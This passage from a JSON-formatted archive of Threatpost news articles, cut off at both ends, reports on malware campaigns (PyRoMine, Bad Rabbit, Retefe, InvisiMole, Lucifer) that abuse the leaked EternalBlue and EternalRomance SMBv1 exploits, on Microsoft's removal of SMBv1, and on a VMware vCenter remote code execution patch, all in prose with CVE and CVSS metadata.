doesn\u2019t phone home to report an infection and doesn\u2019t wait for commands, it still sets up an account on the affected machine and enables Remote Desktop Protocol. The attackers could use the same channel to connect to the machine using the created account to do further attacks.\u201d\n\n**Ripe for Spreading**\n\nBased on the earnings that PyRoMine has so to date (only about $650), it hasn\u2019t exactly lived up to its name and caught fire on the propagation front. But that could rapidly change: For one, the choice of Monero indicates that the criminals are looking to cast a wide net, given that the currency offers an important \u201cfeature\u201d that make it more suitable to the mass market than the more venerable Bitcoin: It relies on a proof-of-work algorithm called CryptoNight, designed for ordinary computers and even mobile phones, rather than for high-end GPUs or the specialized hardware needed for efficient Bitcoin mining. Thus, the potential attack surface consists of consumers and businesses alike, globally.\n\nSecondly, cybercriminals have discovered that enterprises and individuals have been pretty slow when it comes to patching the known vulnerabilities that the NSA tools leverage.\n\nThe ShadowBrokers [leaked a whole treasure chest](<https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/>) of hacking tools and zero-day exploits in 2017, attributed to the Equation Group, which is believed to be an arm of the NSA\u2019s Tailored Access Operations unit. They target Windows XP/Vista/8.1/7/10 and Windows Server 2003/2008/2012/2016, taking advantage of a pair of vulnerabilities, CVE-2017-0144 and CVE-2017-0145. Microsoft [patched these very quickly](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) after the tools were made public.\n\n\u201cThe patch for EternalRomance was released a year ago, but many still don\u2019t think proactive about security,\u201d Manuel told Threatpost. \u201cThe fact that cybercriminals use these exploits tells us that they still profit by using these exploits in their malware.\u201d\n\nAnd finally, EternalRomance is a remote code execution (RCE) exploit that abuses the legacy SMBv1 file-sharing protocol. SMBv1 is typically used only within the local area network of a business, but all too often it\u2019s left exposed to the internet \u2013one of the contributing factors as to why the EternalX attacks WannaCry and NotPetya [were able to spread so widely](<https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/>).\n\n\u201cIn the past, we have seen that these exploits were used by state-sponsored threat actors,\u201d Manuel told us. \u201cWithin days of the release, we started seeing these exploits being used by commodity malware like cryptominers and info-stealers to target general victims.\u201d\n\nPyRoMine isn\u2019t the first miner to use the NSA tools: Researchers have discovered malware authors using the EternalBlue exploit in other cryptocurrency mining malware, such as [Adylkuzz](<https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/>), [Smominru](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>) and [WannaMine](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) \u2013 with great success.\n\nManuel added that because the patch rate is clearly low for the leveraged vulnerabilities, he expects commodity malware to continue to use the NSA exploits for some time to come. More concerning, PyRoMine\u2019s backdoor strategy could become a hallmark going forward.\n\n\u201cI think is going to be something that we see much more of in the future as the tools that are being deployed are multi-faceted,\u201d said Chris Roberts, chief security architect at Acalvio, in an emailed comment. \u201cIn this case, it\u2019s not only mining and disabling security services. It\u2019s also adding itself into several account types, opening up RDP (3389) and basically laying the welcome mat out for future attacks. Several of the latest tool sets are coming armed with various payloads that simply have functionality to deploy attacks, harvest for data and also take advantage of lax security and processing time. And, this all comes in a nice, neat package using the simple issue that we (the human) haven\u2019t patched or don\u2019t pay attention to what we are downloading/clicking. Once again, we are the attack vector and the computer suffers.\u201d\n", "cvss3": {}, "published": "2018-04-26T18:21:13", "type": "threatpost", "title": "PyRoMine Uses NSA Exploit for Monero Mining and Backdoors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "modified": "2018-04-26T18:21:13", "id": "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "href": "https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:27", "description": "One day after [clear ties were established](<https://threatpost.com/bad-rabbit-linked-to-expetrnot-petya-attacks/128611/>) between the [Bad Rabbit ransomware](<https://threatpost.com/badrabbit-ransomware-attacks-hitting-russia-ukraine/128593/>) attacks and this summer\u2019s NotPetya outbreak, researchers at Cisco today strengthened that bond disclosing that the leaked NSA exploit EternalRomance was used to spread the malware on compromised networks.\n\nThis contradicts earlier reports that neither EternalRomance nor EternalBlue were part of this week\u2019s ransomware attack that was confined primarily to Russia and the Ukraine.\n\nCisco said in an [ongoing analysis of Bad Rabbit](<http://blog.talosintelligence.com/2017/10/bad-rabbit.html>) that the implementation of the EternalRomance exploit used in Bad Rabbit has been modified.\n\n\u201cThis is a different implementation of the EternalRomance exploit,\u201d said Martin Lee, technical lead of security research for Cisco\u2019s research arm, Talos. \u201cIt\u2019s different code from what we saw used in NotPetya, but exploiting the same vulnerability in a slightly different implementation.\u201d\n\nEternalRomance is one of a number of Windows exploits [leaked in April by the ShadowBrokers](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>), a still unidentified group that has been [leaking Equation Group exploits](<https://threatpost.com/shadowbrokers-leak-has-strong-connection-to-equation-group/119941/>) for more than a year. Many of those attacks, however, were mitigated in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), a Microsoft security bulletin that included patches for vulnerabilities in the SMBv1 protocol abused by these exploits.\n\nThe publicly available exploits affect older versions of Windows (XP through 7 on the client side and 2003-2008 on Windows Server).\n\nEternalRomance is a remote code execution attack that exploits CVE-2017-0145. What exacerbated the WannaCry and NotPetya attacks was the fact that many organizations had SMBv1 exposed to the internet rather than solely internally. This allowed WannaCry in particular to worm out to the internet and affect machines outside a compromised network.\n\n\u201cThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a type confusion vulnerability leading to an attacker offset controlled arbitrary heap write,\u201d Microsoft said in [an analysis of EternalRomance](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) published in June. \u201cAs with almost any heap corruption exploit, the attacker must know or control the layout of the heap to consistently succeed.\u201d\n\nCisco said in its look at Bad Rabbit this week that it found a type confusion attempt similar to EternalRomance.\n\n\u201cWe can be fairly confident that BadRabbit includes an EternalRomance implementation used to overwrite a kernel\u2019s session security context to enable it to launch remote services, while in Nyetya it was used to install the DoublePulsar backdoor,\u201d Cisco said. \u201cBoth actions are possible due to the fact that EternalRomance allows the attacker to read/write arbitrary data into the kernel memory space.\u201d\n\nDoublePulsar is a post-exploitation memory-based kernel payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish. It was part of the Fuzzbunch exploit platform leaked by the Shadowbrokers.\n\n\u201cThis is a full ring0 payload that gives you full control over the system and you can do what you want to it,\u201d said Sean Dillon, senior security analyst at RiskSense. Dillon was the first to reverse-engineer a DoublePulsar payload, and published his [analysis](<https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html>) in April.\n\nResearchers at Kaspersky Lab on Wednesday confirmed the link between Bad Rabbit and NotPetya, finding similarities in the hashing algorithm used in the two attacks, as well as some of the same domains. It also steals credentials by leveraging the Windows utility WMIC.\n\nUnlike NotPetya, Bad Rabbit is not a wiper attack, Kaspersky Lab confirmed today. Cisco\u2019s Lee also confirmed this is not a wiper.\n\n\u201cThe researchers also found that the Bad Rabbit ransomware code doesn\u2019t contain the kind of mistakes that could be used to decrypt victims\u2019 files and data. There is no way to decrypt information without the attackers\u2019 private key,\u201d Kaspersky Lab said today. \u201cHaving said that, the experts have found a flaw in the code of dispci.exe, which means that the malware doesn\u2019t wipe the generated password from the memory \u2013 so there is a slim possibility to extract it.\u201d\n\nKaspersky Lab also said that it saw traces of the attack dating back to July starting with the compromise of high-profile media sites in Russia including Interfax. Government agencies in Turkey, including the metro in Kiev and a major airport were also serving the malware as were other sits in Turkey, Germany and the U.S.\u2014about 200 in all. The attackers, however, pulled the malicious code once Bad Rabbit was made public.\n\nThe malware was spreading primarily through drive-by downloads where the hacked sites were serving up a phony Flash Player installer that executes a dropper on the compromised machine that reaches out to the attacker\u2019s domain for the rest of the attack. The malware relied on user action to trigger the executable and to grant it excessive permissions through a Windows UAC prompt.\n\nWhile ExPetr was wiper malware in the guise of a ransomware attack, Bad Rabbit installs a malicious executable called dispci.exe which is derived from the free and open source disk encryption software called DiskCryptor.\n\n\u201cThe malware modifies the Master Boot Record (MBR) of the infected system\u2019s hard drive to redirect the boot process into the malware authors code for the purposes of displaying a ransom note,\u201d Cisco said. \u201cThe ransom note that is displayed following the system reboot is very similar to the ransom notes displayed by other ransomware variants, namely Petya, that we have observed in other notable attacks this year.\u201d\n\nThe attackers are demanding 0.05 Bitcoin or $298 USD at today\u2019s exchange rate in exchange for the decryption key that will unlock their hard drives. Each victim is assigned a unique payment wallet, simplifying the process for recovery for victims and profit for the attackers.\n", "cvss3": {}, "published": "2017-10-26T13:53:40", "type": "threatpost", "title": "EternalRomance Exploit Found in Bad Rabbit Ransomware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0145"], "modified": "2017-10-26T13:53:40", "id": "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "href": "https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:32", "description": "The crusty SMBv1 file-sharing protocol, abused by a [NSA exploit](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>) last month that spread [WannaCry](<https://threatpost.com/someone-failed-to-contain-wannacry/126335/>), will be removed from Windows 10 starting with the upcoming Redstone 3 update.\n\n\u201cWe can confirm that SMBv1 is being removed for Redstone 3,\u201d a Microsoft representative told Threatpost.\n\nRedstone 3, a code-name for the Fall Creators Update, will begin the phasing out of SMBv1, a plan that reportedly has been in the works for years and is not a reaction to the EternalBlue exploit, nor WannaCry. It is due in September.\n\nSMBv1, short for the Server Message Block protocol, provides shared access to Windows file and print services on a local network. Attackers believed to have [ties to North Korea](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) used the EternalBlue exploit, leaked in April by the ShadowBrokers, to spread the ransomware worldwide on May 12. Hospitals in the U.K., giant telecommunications providers across Europe, and many businesses in Russia and across Asia fell victim to WannaCry, which eventually infected unpatched Windows servers running SMBv1 in more than 150 countries.\n\nMicrosoft had [patched the SMBv1 vulnerability](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) in question in March in MS17-010, one month before the ShadowBrokers\u2019 leak, and urged admins worldwide to install the patch immediately. The WannaCry outbreak, however, demonstrated that many organizations did not heed those warnings; the ransomware, generally derided for its shoddy coding, still managed to infect more than 200,000 servers.\n\nThe weaponized version of EternalBlue released by the ShadowBrokers is effective against only Windows 7 and Windows XP machines, but researchers at RiskSense were able to build a [Windows 10 port](<https://threatpost.com/nsas-eternalblue-exploit-ported-to-windows-10/126087/>) that bypasses some of the mitigations in the Current Branch for Business version of the operating system. While a report on RiskSense\u2019s Windows 10 version of the attack is available, researchers won\u2019t release new offsets used to weaponize their attack.\n\nMicrosoft, meanwhile, continues to plead with users running legacy versions of Windows to upgrade to Windows 10. The current version of the operating system includes a number of [mitigations](<https://threatpost.com/windows-10-mitigations-make-future-eternalblue-attacks-difficult/126132/>) to deny EternalBlue and other weapons-grade Windows attacks leaked in April. Researchers echo those pleas as well, praising Windows 10\u2019s mitigations such as kernel ASLR and DEP and virtualization-based security in Device Guard.\n\nMicrosoft this week released an [analysis of EternalBlue and EternalRomance](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), another SMB remote code execution attack and describe how each of the above mitigations, in addition to kernel Control Flow Guard, break the exploits available in the wild.\n\n\u201cThrough VBS\u2019s usage of CPU hypervisor functionality, Device Guard-enabled systems can verify and enforce integrity of code that\u2019s mapped in the kernel address space,\u201d wrote Viktor Brange of the Windows Offensive Security Research Team. \u201ckCFG prevents many exploitation techniques that rely on corrupting function pointers to achieve code execution.\u201d\n\nWhile EternalBlue and its [DoublePulsar backdoor](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) have been studied on many fronts, EternalRomance is another SMBv1 attack that exploits a separate vulnerability, CVE-2017-0145, to gain remote code execution capabilities.\n\n\u201cThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a type confusion vulnerability leading to an attacker offset controlled arbitrary heap write,\u201d Brange wrote. \u201cAs with almost any heap corruption exploit, the attacker must know or control the layout of the heap to consistently succeed. With SMB, most objects are allocated in the non-paged pool.\u201d\n\nIn its analysis, Microsoft explains how an attacker could learn a reliable heap layout, build primitives from corruption of the heap, and how all this enables installation of the in-memory backdoor.\n\nIn addition to patching, Microsoft warns customers that exposing port 445 to the internet are making a massive mistake, and that SMB should be run inside the firewall.\n\n\u201cHowever, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise,\u201d Microsoft said.\n", "cvss3": {}, "published": "2017-06-20T08:41:13", "type": "threatpost", "title": "SMBv1 to be Disabled in Windows Fall Creators Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0145"], "modified": "2017-06-26T19:14:10", "id": "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "href": "https://threatpost.com/say-goodbye-to-smbv1-in-windows-fall-creators-update/126387/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:08", "description": "Criminals behind the Retefe banking Trojan have added a new component to their malware that uses the [NSA exploit EternalBlue](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>).\n\nThe update makes Retefe the latest malware family to adopt the SMBv1 attack against a patched Windows vulnerability, and could signal an emerging trend, said researchers at Proofpoint. Earlier this year, researchers at Flashpoint observed the TrickBot banking Trojan had added an EternalBlue module as well.\n\nWhile Retefe has never reached the scale or reputation of similar Trojans such as Dridex or Zeus, it is notable for its interesting implementations and consistent regional focus in Austria, Sweden, Switzerland, Japan and more recently the United Kingdom, researchers said.\n\n\u201cUnlike Dridex or other banking Trojans that rely on webinjects to hijack online banking sessions, Retefe operates by routing traffic to and from the targeted banks through various proxy servers, often hosted on the TOR network,\u201d said Proofpoint in a technical post Thursday explaining its [research](<https://www.proofpoint.com/us/threat-insight/post/retefe-banking-trojan-leverages-eternalblue-exploit-swiss-campaigns>).\n\nOver the past several months, researchers have observed a wave of new Retefe campaigns consisting of unsolicited emails containing malicious Microsoft Office documents. Attachments contain embedded Package Shell Objects, or Object Linking and Embedding Objects, that are typically Windows Shortcut \u201c.lnk\u201d files, researchers said.\n\nIf the user opens the shortcut and accepts the security warning that appears, a PowerShell command initiates the download of a self-extracting Zip archive hosted on a remote server. The Zip archive contains an obfuscated JavaScript installer.\n\nWhen researchers de-obfuscated the JavaScript installer they found several configuration session parameters. In recent weeks, researchers said, a \u201cpseb:\u201d parameter has been added which references a script that implements the EternalBlue exploit that can be used to spread laterally within targeted networks.\n\n\u201cWe first observed the \u2018pseb:\u2019 parameter on Sept. 5. The \u2018pseb:\u2019 configuration implements the EternalBlue exploit, borrowing most of its code from a publicly available proof-of-concept,\u201d researchers wrote.\n\nProofpoint said the ExternalBlue parameter used by the adversary also contains functionality to log the installation and victim configuration details and uploads data to an FTP server.\n\nThe payload configuration for this implementation of EternalBlue downloads a PowerShell script from a remote server, which includes an embedded executable that installs Retefe, researchers said.\n\n\u201cWe are observing increasingly targeted attacks from this group, that, with the addition of the EternalBlue exploit, creates opportunities for effective propagation within networks once initial targets have been compromised,\u201d Proofpoint wrote.\n\nResearchers note, on Sept.20, the \u201cpseb:\u201d section had been replaced with a new \u201cpslog:\u201d section that contained only the EternalBlue logging functions. \u201cThis installation, however, lacks the the \u2018pseb:\u2019 module responsible for further lateral spread via EternalBlue, thus avoiding an infinite spreading loop,\u201d they said.\n\nResearchers urge companies to ensure that they are fully patched against the EternalBlue vulnerability ([CVE-2017-0144](<https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>)). \u201cCompanies should also block associated traffic in IDS systems and firewalls and block malicious messages (the primary vector for Retefe) at the email gateway,\u201d Proofpoint added.\n", "cvss3": {}, "published": "2017-09-22T14:02:28", "type": "threatpost", "title": "EternalBlue Exploit Used in Retefe Banking Trojan Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0144"], "modified": "2017-09-22T18:02:28", "id": "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "href": "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-19T14:17:35", "description": "The InvisiMole threat group has resurfaced in a new campaign, revealing a new toolset and a strategic collaboration with the [high-profile Gamaredon](<https://threatpost.com/gamaredon-apt-toolset-ukraine/152568/>) advanced persistent threat (APT) group.\n\nInvisiMole was [first uncovered by ESET in 2018](<https://threatpost.com/invisimole-burrows-into-targets-with-rich-espionage-tools/132730/>), with cyberespionage activity dating back to 2013 in operations in Ukraine and Russia. More recently, from late 2019 until at least this month, researchers have spotted the group attacking a few high-profile organizations in the military sector and diplomatic missions, both in Eastern Europe. These attacks were \u201chighly targeted,\u201d affecting only a few dozen computers.\n\nThis more recent campaign allowed researchers to find the \u201cmissing pieces of the puzzle\u201d on the group\u2019s latest tactics, techniques and procedures (TTPs), observing the group\u2019s updated, sophisticated toolset being used for the delivery, lateral movement and execution of InvisiMole\u2019s backdoors.\n\n\u201cAfter discovering new activity in late 2019, we gained the opportunity to take a proper look under the hood of InvisiMole\u2019s operations and piece together the hidden parts of the story,\u201d said researchers with ESET in a Thursday analysis, shared at ESET Virtual World 2020. \u201cAnalyzing the group\u2019s updated toolset, we observed continuous development and substantial improvements, with special focus on staying under the radar.\u201d\n\n## **Updated Toolset**\n\nBack when InvisiMole was first uncovered in 2018, researchers documented two backdoors used by the threat group, RC2CL and RC2FM. These two backdoors feature various espionage functionalities, including recording the victim on their webcam and microphone, tracking the geolocation of the victim and collecting recently accessed documents.\n\nThe InvisiMole malware has since been updated with new changes aiming to add stealth to its operations. The updated InvisiMole toolset relies heavily on [\u201cliving off the land\u201d techniques](<https://threatpost.com/linkedin-job-offers-targeted-aerospace-military-firms-with-malware/156614/>), which are used across its four different execution chains, abusing legitimate applications to perform malicious operations while flying under the radar. For instance, the components used by InvisiMole malware are encrypted using a legitimate Windows feature named the Data Protection API, a feature that allows users to protect data in their apps. This tactic \u201censures that the payload can only be decrypted and executed on the affected computer, thus protecting it from analysis by security researchers,\u201d said researchers.\n\nThe updated InvisiMole toolset also features a new component that uses [DNS tunneling](<https://threatpost.com/tracking-malware-that-uses-dns-for-exfiltration/111147/>) for stealthier command-and-control (C2) communication. [DNS tunneling](<https://threatpost.com/wekby-apt-gang-using-dns-tunneling-for-command-and-control/118303/>) involves encoding the data of other programs or protocols in DNS queries and responses; often involving data payloads that can be added to an attacked DNS server and used to control a remote server and applications.\n\nResearchers also discovered that InvisiMole uses [NSA exploit EternalBlue](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>) and [BlueKeep exploit](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) (CVE-2019-0708 and CVE-2017-0144, respectively) for lateral movement in its victims\u2019 networks.\n\n\u201cIn this recent campaign, the backdoor [uses] added functionality to scan the compromised network for hosts that support the vulnerable SMBv1.0 protocol,\u201d said researchers. \u201cInvisiMole uses this capability to spread in the network via the EternalBlue exploit.\u201d\n\n## **Gamaredon Link**\n\nDuring their investigation, researchers found attempts to deploy the InvisiMole malware using server infrastructure that is known to be used by Gamaredon. The Gamaredon APT, which has been active since at least 2013, is responsible for a number of high-profile attacks, including [recent attacks on Ukrainian national security targets](<https://threatpost.com/gamaredon-apt-toolset-ukraine/152568/>).\n\nMore recently, in 2020, [the threat group](<https://threatpost.com/microsoft-outlook-users-targeted-by-gamaredons-new-vba-macro/156484/>) gave its post-compromise toolset a facelift with the addition of a new Visual Basic for Applications (VBA) macro, targeting Microsoft Outlook users. Despite this recent innovation, the tools utilized by Gamaredon have historically been very simple and designed to gather sensitive data from compromised systems.\n\nIn its partnership with InvisiMole, researchers believe that Gamaredon plays a role in initially infiltrating networks of interest (typically via spear-phishing attacks) using these simple tools, and possibly gaining administrative privileges. Then, InvisiMole, whose more advanced tooling requires elevated rights, steps in.\n\n\u201cThis discovery also reveals a previously unreported cooperation between the Gamaredon and InvisiMole groups,\u201d said researchers. \u201cHowever, it should be noted these two groups use different TTPs and have a varying level of sophistication\u2014the Gamaredon group seems to make no effort in trying to stay under the radar, in contrast with the stealthiness of InvisiMole demonstrated in the recent campaign.\u201d\n\n**_Insider threats are different in the work-from home era. On _**[**_June 24 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_, join the Threatpost edit team and our special guest, Gurucul CEO Saryu Nayyer, for a FREE webinar, \u201c_**_**The Enemy Within: How Insider Threats Are Changing.\u201d **_**_Get helpful, real-world information on how insider threats are changing with WFH, what the new attack vectors are and what companies can do about it_**_**. **_[**_Please register here_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_ for this Threatpost webinar._**\n", "cvss3": {}, "published": "2020-06-18T09:30:00", "type": "threatpost", "title": "InvisiMole Group Resurfaces Touting Fresh Toolset, Gamaredon Partnership", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2019-0708"], "modified": "2020-06-18T09:30:00", "id": "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "href": "https://threatpost.com/invisimole-resurfaces-gamaredon-partnership/156674/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:40:45", "description": "Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.\n\nThe never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an \u201cexhaustive\u201d list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.\n\n\u201cLucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team, on[ Wednesday in a blog post](<https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/>). \u201cApplying the updates and patches to the affected software are strongly advised.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities targeted by Lucifer include Rejetto HTTP File Server ([CVE-2014-6287](<https://nvd.nist.gov/vuln/detail/CVE-2014-6287>)), Oracle Weblogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)), ThinkPHP RCE ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), Apache Struts ([CVE-2017-9791](<https://nvd.nist.gov/vuln/detail/CVE-2017-9791>)), Laravel framework [CVE-2019-9081](<https://nvd.nist.gov/vuln/detail/CVE-2019-9081>)), and Microsoft Windows ([CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>), and [CVE-2017-8464](<https://nvd.nist.gov/vuln/detail/CVE-2017-8464>)).\n\nAfter successfully exploiting these flaws, the attacker then connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, said researchers. These commands include performing a TCP, UDP or HTTP [DoS attack](<https://threatpost.com/massive-ddos-amazon-telecom-infrastructure/150096/>). Other commands allow the malware to drop an [XMRig miner](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and launch [cryptojacking attacks](<https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/>), as well as collecting interface info and sending the miner status to the C2. Researchers say that as of Wednesday, the XMR wallet has paid 0.493527 XMR (approximately $32).\n\nThe malware is also capable of self-propagation through various methods.\n\nIt scans either for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. If either of these are open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42\u2019s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.\n\nIn addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the [EternalBlue](<https://threatpost.com/tag/eternalblue/>), [EternalRomance](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>), and [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) exploits.\n\nOnce these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.\n\nLucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.\n\nThese added capabilities show that the malware is growing in sophistication, researchers warn. They say, enterprises can protect themselves with simply security measures such as applying patches and strengthening passwords.\n\n\u201cWhile the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it\u2019s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,\u201d stressed researchers.\n\n_This article was updated on June 25 to reflect the accurate conversion of XMR to USD._\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-24T21:20:16", "type": "threatpost", "title": "Self-Propagating Lucifer Malware Targets Windows Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6287", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-10271", "CVE-2017-8464", "CVE-2017-9791", "CVE-2018-20062", "CVE-2019-9081"], "modified": "2020-06-24T21:20:16", "id": "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "href": "https://threatpost.com/self-propagating-lucifer-malware-targets-windows-systems/156883/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-25T02:52:39", "description": "[](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)\n\nClick to Register\n\nVMware has patched three vulnerabilities in its virtual-machine infrastructure for data centers, the most serious of which is a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system to find other vulnerable points of network entry to take over affected systems.\n\nPositive Technologies researcher Mikhail Klyuchnikov discovered two of the flaws in vCenter Server, the centralized management and automation platform for VMware\u2019s vSphere virtualization platform, which\u2014given VMware\u2019s dominant position in the market\u2014is used by the majority of enterprise data centers. Among its duties, vCenter Server manages virtual machines, multiple ESXi hypervisor hosts and other various dependent components from a central management dashboard.\n\n## **Where the VMware Flaws Were Found, What\u2019s Effected? **\n\nThe researcher found the most critical of the flaws, which is being tracked as [CVE-2021-21972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972>) and has a CVSS v3 score of 9.8, in a vCenter Server plugin for vROPs in the vSphere Client functionality, according to [an advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) posted online Tuesday by VMware.\n\n\u201cA malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,\u201d the company said.\n\nThe plugin is available in all default installations\u2014potentially giving attackers a wide attack surface\u2013and vROPs need not be present to have this endpoint available, according to VMware.\n\nThe main threat in terms of exploiting the vulnerability comes from insiders who have penetrated the protection of the network perimeter using other methods\u2013such as social engineering or web vulnerabilities\u2013or have access to the internal network using previously installed backdoors, according to Positive Technologies.\n\nKlyuchnikov said the VMware flaw poses \u201cno less threat\u201d than a notoriously easy-to-exploit[ Citrix RCE vulnerability](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>), [CVE-2019-19781](<https://www.google.ru/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiOm6_Z4rnuAhWwlosKHTPHARo4ChAWMAJ6BAgLEAI&url=https://www.forbes.com/sites/daveywinder/2020/01/25/critical-security-warning-as-shitrix-hackers-ramp-up-critical-citrix-vulnerability-cve201919781-attacks/&usg=AOvVaw2MEaqcCGRpYlOcxC-Bey_j>), which was discovered two years ago affecting more than 25,000 servers globally. It is especially dangerous because \u201cit can be used by any unauthorized user,\u201d he 